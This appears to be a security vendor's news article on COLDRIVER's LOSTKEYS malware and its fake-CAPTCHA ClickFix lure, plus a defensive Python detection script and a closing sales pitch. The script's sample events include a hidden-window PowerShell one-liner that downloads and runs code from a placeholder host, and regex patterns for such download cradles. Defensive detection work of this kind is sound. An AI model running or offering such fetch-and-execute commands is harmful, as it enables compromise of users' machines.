
Russian Hackers Unleash LOSTKEYS Malware Through Deceptive ClickFix CAPTCHA

In a recent wave of cyber espionage, Russian hackers linked to the group COLDRIVER have deployed a new malware strain known as LOSTKEYS. This sophisticated attack utilizes a fake CAPTCHA as a lure, targeting Western entities, including government officials, NGOs, and journalists, to steal sensitive information.


Key Takeaways

  • Malware Name: LOSTKEYS, linked to the COLDRIVER hacking group.

  • Attack Method: Utilizes a fake CAPTCHA to trick victims into executing malicious PowerShell commands.

  • Target Audience: Focused on Western government officials, military advisors, and NGOs, particularly those connected to Ukraine.

  • Capabilities: Capable of stealing files, system information, and running processes from compromised devices.

Overview Of The Attack

The COLDRIVER group, also known by aliases such as UNC4057 and Star Blizzard, has shifted its tactics from traditional credential phishing to deploying malware like LOSTKEYS. This change reflects a broader strategy to enhance their intelligence-gathering capabilities.

The attack begins with victims being directed to a malicious website featuring a fake CAPTCHA prompt. Once the CAPTCHA is “verified,” victims are instructed to copy and paste a PowerShell command into their Windows Run dialog. This command initiates a multi-stage infection process designed to evade detection.

Technical Details Of LOSTKEYS

  1. Initial Stage: Victims execute a PowerShell command that downloads a payload from a remote server.

  2. Evading Detection: The malware computes a hash of the display resolution and compares it against a set of known values, refusing to run inside virtual machines so that only intended targets are infected.

  3. Payload Delivery: The final stage downloads and decodes Base64-encoded files, including a VBScript (VBS) decoder that executes the LOSTKEYS malware on the victim's machine.
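
As an added defender-side example (not code from this article or from the sources it summarises), the following Python script scans constructed Sysmon-style process-creation events for the launch pattern described above: PowerShell started by explorer.exe, which is how a command pasted into the Run dialog is executed, combined with a download cradle, hidden window or encoded command on the command line. The event layout, field names and sample lines are assumptions made for illustration.

```python
import re

# Constructed process-creation events in a Sysmon-style key=value layout (not real telemetry).
SAMPLE_EVENTS = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -w hidden -c iwr http://example.invalid/a | iex"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -enc SQBFAFgA"',
    'ParentImage=C:\\Tools\\Code.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -File build.ps1"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="value with spaces"

# Command-line traits that, together with the parent/child pair, characterise a pasted ClickFix one-liner.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I),
    "inline_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}

def parse_event(line):
    """Split one event line into a dict of field name -> value."""
    return {k: q or v for k, q, v in FIELD_RE.findall(line)}

def classify(event):
    """Return matched indicator names; [] unless PowerShell was started by explorer.exe
    (how a Run-dialog command is launched) with at least one suspicious command-line trait."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    if parent != "explorer.exe" or image not in ("powershell.exe", "pwsh.exe"):
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def scan(lines):
    """Return (line_index, indicators) for every event the rule fires on."""
    return [(i, found) for i, line in enumerate(lines) if (found := classify(parse_event(line)))]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: suspicious ({', '.join(reasons)})")
```

The third sample (PowerShell launched by an editor to run a build script) and the fourth (Notepad from the desktop) are deliberately benign controls, so the rule fires only on the first two.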

Targeted Entities

The primary targets of the LOSTKEYS malware campaign include:

  • Current and former advisors to Western governments.

  • Journalists and think tanks.

  • NGOs, particularly those involved in issues related to Ukraine.

This targeted approach indicates a strategic alignment with Russian geopolitical interests, aiming to disrupt or discredit adversarial organizations.

Implications Of The Attack

The deployment of LOSTKEYS marks a significant evolution in COLDRIVER's tactics, showcasing their ability to adapt and employ more complex methods of cyber espionage. The malware's capabilities to exfiltrate sensitive data and conduct reconnaissance activities pose serious risks to national security and the integrity of information held by targeted organizations.

As the ClickFix method continues to gain traction among various threat actors, the cybersecurity community must remain vigilant and strengthen its defenses against such social engineering tactics. Organizations are encouraged to implement robust security measures, including user education on recognizing phishing attempts and on verifying the authenticity of online prompts before following their instructions.

The emergence of LOSTKEYS highlights the ongoing threat posed by state-sponsored hacking groups and the need for continuous adaptation in cybersecurity strategies to protect sensitive information from falling into the wrong hands. As cyber threats grow more sophisticated, staying informed is more important than ever. BetterWorld Technology delivers advanced cybersecurity solutions designed to adapt with the threat landscape—ensuring your business stays protected while continuing to innovate. Take the first step toward stronger security—contact us today for a consultation!

